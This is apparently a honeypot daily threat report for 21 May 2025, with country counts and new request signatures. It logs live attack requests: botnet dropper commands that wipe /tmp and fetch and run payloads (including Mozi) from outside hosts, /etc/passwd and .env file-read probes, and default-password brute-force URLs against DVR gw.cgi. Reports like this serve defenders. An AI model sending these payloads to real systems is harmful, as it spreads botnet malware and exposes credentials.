Table of Contents

Daily Report: 2025-05-21
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 46 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1298 requests were recorded during the day, originating from 2 different countries, with a peak of 199 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
156.218.77.123	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1
117.209.127.246	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.209.127.246:60642/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
16	5	GET /@fs/etc/passwd?raw?? HTTP/1.1
18	5	GET /@fs/C://windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
23	5	GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
24	5	GET /@fs/C://windows/win.ini?raw?? HTTP/1.1
170	1	GET /OdinHttpCall1747824619 HTTP/1.1
171	1	GET /Odin/http/call1747824619 HTTP/1.1
199	1	GET /odinhttpcall1747823621 HTTP/1.1
200	1	GET /OdinHttpCall1747823621 HTTP/1.1
201	1	GET /Odin/http/call1747823621 HTTP/1.1
205	1	GET /odinhttpcall1747824619 HTTP/1.1
255	1	GET /Api/v2/.env HTTP/1.1
256	1	GET /Apis/.env HTTP/1.1
278	1	GET /Client/.env HTTP/1.1
279	1	GET /Club/.env HTTP/1.1
280	1	GET /Cms/.env HTTP/1.1
281	1	GET /Community/.env HTTP/1.1
283	1	GET /Contact/.env HTTP/1.1
289	1	GET /App/config/.env HTTP/1.1
296	1	GET /Content/.env HTTP/1.1
335	1	GET /odinhttpcall1747793069 HTTP/1.1
336	1	GET /OdinHttpCall1747793069 HTTP/1.1
337	1	GET /Odin/http/call1747793069 HTTP/1.1
344	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin123%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
345	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
346	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
347	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%221234567a%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
348	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123456a@%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
349	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123abc456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
350	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22abcd1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
351	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Autism321%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
352	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Password%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
364	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin123%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
365	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin123456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
377	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
387	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%221234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
388	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%2212345%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
400	1	GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
404	1	GET /Apps/.env HTTP/1.1
405	1	GET /Assets/.env HTTP/1.1
406	1	GET /Auth/.env HTTP/1.1
407	1	GET /Awstats/.env HTTP/1.1
408	1	GET /Back/.env HTTP/1.1
433	1	GET /app_dev.php/_profiler/.env HTTP/1.1
483	1	GET /odinhttpcall1747825414 HTTP/1.1
484	1	GET /OdinHttpCall1747825414 HTTP/1.1
485	1	GET /Odin/http/call1747825414 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	199	BG
1	196	US
2	164	CA
3	152	DE
4	106	CN
5	91	GB
6	67	IN
7	56	PL
8	50	NL
9	50	FR
10	28	HK
11	16	SC
12	13	TH
13	12	LT
14	11	VN
15	11	PT
16	10	SG
17	9	CH
18	8	GH
19	7	UA
20	5	AZ
21	4	RO
22	3	ES
23	3	BE
24	3	AO
25	3	ZA
26	2	VE
27	2	KR
28	2	JP
29	2	ZM
30	2	IT
31	2	IL
32	2	BR
33	2	ID
34	1	AF
35	1	LV
36	1	AR
37	1	EG
38	1	SE

Report: 2025-05-20

20 May 2025·411 words

Repport Daily

Report: 2025-05-19

19 May 2025·443 words

Repport Daily

Report: 2025-05-18

18 May 2025·4142 words

Repport Daily

	number_of_occurence	country_iso_code
0	199	BG
1	196	US
2	164	CA
3	152	DE
4	106	CN
5	91	GB
6	67	IN
7	56	PL
8	50	NL
9	50	FR
10	28	HK
11	16	SC
12	13	TH
13	12	LT
14	11	VN
15	11	PT
16	10	SG
17	9	CH
18	8	GH
19	7	UA
20	5	AZ
21	4	RO
22	3	ES
23	3	BE
24	3	AO
25	3	ZA
26	2	VE
27	2	KR
28	2	JP
29	2	ZM
30	2	IT
31	2	IL
32	2	BR
33	2	ID
34	1	AF
35	1	LV
36	1	AR
37	1	EG
38	1	SE

	number_of_occurence	country_iso_code
0	199	BG
1	196	US
2	164	CA
3	152	DE
4	106	CN
5	91	GB
6	67	IN
7	56	PL
8	50	NL
9	50	FR
10	28	HK
11	16	SC
12	13	TH
13	12	LT
14	11	VN
15	11	PT
16	10	SG
17	9	CH
18	8	GH
19	7	UA
20	5	AZ
21	4	RO
22	3	ES
23	3	BE
24	3	AO
25	3	ZA
26	2	VE
27	2	KR
28	2	JP
29	2	ZM
30	2	IT
31	2	IL
32	2	BR
33	2	ID
34	1	AF
35	1	LV
36	1	AR
37	1	EG
38	1	SE

Daily Report: 2025-05-21#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-05-21
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	199	BG
1	196	US
2	164	CA
3	152	DE
4	106	CN
5	91	GB
6	67	IN
7	56	PL
8	50	NL
9	50	FR
10	28	HK
11	16	SC
12	13	TH
13	12	LT
14	11	VN
15	11	PT
16	10	SG
17	9	CH
18	8	GH
19	7	UA
20	5	AZ
21	4	RO
22	3	ES
23	3	BE
24	3	AO
25	3	ZA
26	2	VE
27	2	KR
28	2	JP
29	2	ZM
30	2	IT
31	2	IL
32	2	BR
33	2	ID
34	1	AF
35	1	LV
36	1	AR
37	1	EG
38	1	SE